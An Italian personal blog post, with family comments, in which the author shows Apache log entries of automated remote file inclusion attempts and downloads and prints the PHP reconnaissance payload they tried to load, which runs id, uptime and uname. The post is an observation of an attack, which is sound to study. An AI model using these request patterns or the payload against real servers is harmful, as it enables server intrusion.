spulciando i log

Questo pomeriggio, dato che a lavoro mi annoiavo un pò, mi sono messo a spulciare l’access log di apache.. e tra le varie richieste assurde ho notato queste:


69.93.255.250 - - [01/Apr/2008:08:46:01 +0200] "GET
//t-counter/t_countpro.cgi?view//portfolio/msg/view.php?
av=http://www.simpa.es/includes/data/alba.txt???
HTTP/1.1" 404 301 "-" "libwww-perl/5.808"
69.93.255.250 - - [01/Apr/2008:08:46:01 +0200] "GET
//t-counter/t_countpro.cgi?view//portfolio/msg/view.php?
av=http://www.simpa.es/includes/data/alba.txt???
HTTP/1.1" 404 301 "-" "libwww-perl/5.808"
75.118.25.104 - - [01/Apr/2008:08:46:57 +0200] "GET
//t-counter/t_countpro.cgi?view//portfolio/msg/view.php?
av=http://www.simpa.es/includes/data/alba.txt???
HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
62.149.36.33 - - [01/Apr/2008:08:56:59 +0200] "GET
//t-counter/t_countpro.cgi?view//portfolio/msg/view.php?
av=http://www.silak.eu//components/com_rwcard/alba.txt???
HTTP/1.1" 404 301 "-" "libwww-perl/5.808"
62.149.36.33 - - [01/Apr/2008:08:56:59 +0200] "GET
//t-counter/t_countpro.cgi?view//portfolio/msg/view.php?
av=http://www.silak.eu//components/com_rwcard/alba.txt???
HTTP/1.1" 404 301 "-" "libwww-perl/5.808"

incuriosito da che file cercasse di scaricarsi sul mio server ho fatto io il download visto che lui non ci riusciva (code 404):

root@ajna /tmp # wget http://www.silak.eu//components/com_rwcard/alba.txt
--15:28:29-- http://www.silak.eu//components/com_rwcard/alba.txt
=> `alba.txt'
Resolving www.silak.eu... 82.119.241.4
Connecting to www.silak.eu|82.119.241.4|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 614 [text/plain]

100%[================================>] 614 --.--K/s

15:28:29 (97.59 MB/s) - `alba.txt' saved [614/614]

root@ajna /tmp # cat alba.txt
";
$alb = @php_uname();
$alb2 = system(uptime);
$alb3 = system(id);
$alb4 = @getcwd();
$alb5 = getenv("SERVER_SOFTWARE");
$alb6 = phpversion();
$alb7 = $_SERVER['SERVER_NAME'];
$alb8 = gethostbyname($SERVER_ADDR);
$alb9 = get_current_user();
$os = @PHP_OS;
echo "os: $os< br >";
echo "uname -a: $alb< br >";
echo "uptime: $alb2< br >";
echo "id: $alb3< br >";
echo "pwd: $alb4< br >";
echo "user: $alb9< br >";
echo "phpv: $alb6< br >";
echo "SoftWare: $alb5< br >";
echo "ServerName: $alb7< br >";
echo "ServerAddr: $alb8< br >";
echo "UNITED ALBANIANS aka ALBOSS PARADISE< br >";
exit;

?>
root@ajna /tmp #

Ironico il destino, proprio a me doveva capitare questo tentativo di craking :)

3 pensieri riguardo “spulciando i log

  • 2 Aprile 2008 in 13:03
    Permalink

    Sorella, tu non sei nerd ma filosofa.. è ovvio che non mi capisci!! :)

    ciao

  • 2 Aprile 2008 in 12:17
    Permalink

    Certe volte parli un’altra lingua…Sei sicuro di essere mio fratello?
    Fra

  • 1 Aprile 2008 in 18:32
    Permalink

    Sono bot che girano il web in automatico. Passano di frequente anche da me… cercano qualche falla che automaticamente vada a recuperare informazioni per bucare i server…
    Ciao,
    Emanuele

Lascia un commento

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *

Questo sito usa Akismet per ridurre lo spam. Scopri come i tuoi dati vengono elaborati.